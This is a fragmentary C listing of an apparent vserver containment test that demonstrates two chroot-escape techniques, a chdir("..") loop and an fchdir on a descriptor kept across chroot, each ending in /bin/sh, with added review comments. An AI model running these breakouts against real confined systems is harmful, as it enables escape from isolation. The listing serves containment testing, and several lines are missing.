1 // $Id: escaperoot.c,v 1.3 2004/01/13 14:56:26 ensc Exp $
3 // Copyright (C) 2003 Enrico Scholz <enrico.scholz@informatik.tu-chemnitz.de>
4 // based on tests/escaperoot.cc by Jacques Gelinas
6 // This program is free software; you can redistribute it and/or modify
7 // it under the terms of the GNU General Public License as published by
8 // the Free Software Foundation; either version 2, or (at your option)
11 // This program is distributed in the hope that it will be useful,
12 // but WITHOUT ANY WARRANTY; without even the implied warranty of
13 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 // GNU General Public License for more details.
16 // You should have received a copy of the GNU General Public License
17 // along with this program; if not, write to the Free Software
18 // Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
21 This program tries to escape from a vserver by exploiting chroot flaws.
22 Once escaped, it execs a shell.
24 None of this works on 2.4.13.
// Print the process's current working directory to stdout as "PWD: <path>".
// NOTE(review): the declaration of `path` and the closing braces are not
// visible in this listing (the gutter jumps from 35 to 38 and stops at 39),
// so the buffer size cannot be confirmed from here.
35 static void print_pwd()
// getcwd() is given sizeof(path)-1 as the length; output happens only when
// it returns non-NULL. No handling of the NULL case is visible.
38 if (getcwd(path,sizeof(path)-1)!=NULL){
39 printf ("PWD: %s\n",path);
43 Just chroot into a sub-directory while keeping the
44 current directory outside of (behind) the new root
// Containment check: chroot() into a newly created sub-directory without
// chdir()ing into it, then try to walk upwards with chdir("..").
// Going by the "All attempts failed" message further down, the intended
// outcome on a correctly confined guest is presumably that the walk never
// leaves the guest's root -- confirm against the full file.
// NOTE(review): the function header, local declarations and several lines
// in between are missing from this listing (see the gaps in the gutter).
// mkdir()'s return value is ignored; any failure only surfaces through the
// chroot() error reported below.
50 mkdir ("dummy_dir",0755);
51 if (chroot ("dummy_dir")==-1){
52 fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno));
55 // Try to chdir into the real root
// Up to 1000 upward steps; the chdir() results are not checked, so the loop
// itself gives no indication of where the process ended up.
56 for (i=0; i<1000; i++) chdir("..");
// The message is printed only when /bin/sh could not be started (execl()
// returned -1). No check is visible that the walk actually left the new
// root, so a spawned shell alone does not demonstrate an escape; whoever
// runs the test has to verify which root the shell sees.
58 if (execl ("/bin/sh","/bin/sh",NULL)==-1){
59 fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno));
65 Same as test1, except we open the current directory and do
66 a fchdir() to it before trying to escape to the real root.
// Containment check, fchdir() variant: a descriptor for the current
// directory is opened before chroot() and used with fchdir() afterwards.
// Defensive takeaway: a process must not carry directory descriptors
// opened outside its new root across chroot(); close them before confining.
// NOTE(review): the function header, the test on `fd`, the rest of the
// fchdir() error message and other lines are missing from this listing.
// mkdir()'s return value is ignored here as well.
74 mkdir ("dummy_dir",0755);
// Opened while the working directory is still outside the future root.
// NOTE(review): no close(fd) is visible in this fragment -- confirm.
75 fd = open (".",O_RDONLY);
77 fprintf (stderr,"Can't open current directory (%s)\n",strerror(errno));
// Each step runs only if the previous one succeeded (else-if chain).
78 }else if (chroot ("dummy_dir")==-1){
79 fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno));
80 }else if (fchdir(fd)==-1){
81 fprintf (stderr,"Can't fchdir to the current directory (%s)\n"
85 // Try to chdir into the real root
86 for (i=0; i<1000; i++) chdir("..");
// As in the first check: the chdir() results above are unchecked, and the
// message below appears only when execl() itself fails.
88 if (execl ("/bin/sh","/bin/sh",NULL)==-1){
89 fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno));
95 Perform the test in a sub-process so it won't affect the current one
// Run one attempt, passed as the function pointer f, in a sub-process so
// that its chroot()/chdir() side effects do not change the calling process.
// NOTE(review): the fork() call, the child branch and any wait for the
// child are not visible in this listing (the gutter jumps from 97 to 103).
97 static void dotest (void (*f)())
// fork() failed: report the errno text on stderr.
103 }else if (pid == -1){
104 fprintf (stderr,"Can't fork (%s)\n",strerror(errno));
// NOTE(review): the enclosing function is not visible in this listing.
// Presumably this is reached only after every attempt has returned without
// its exec'd shell taking over, i.e. it is the "guest stayed confined"
// result -- confirm against the full file.
115 printf ("All attempts failed\n");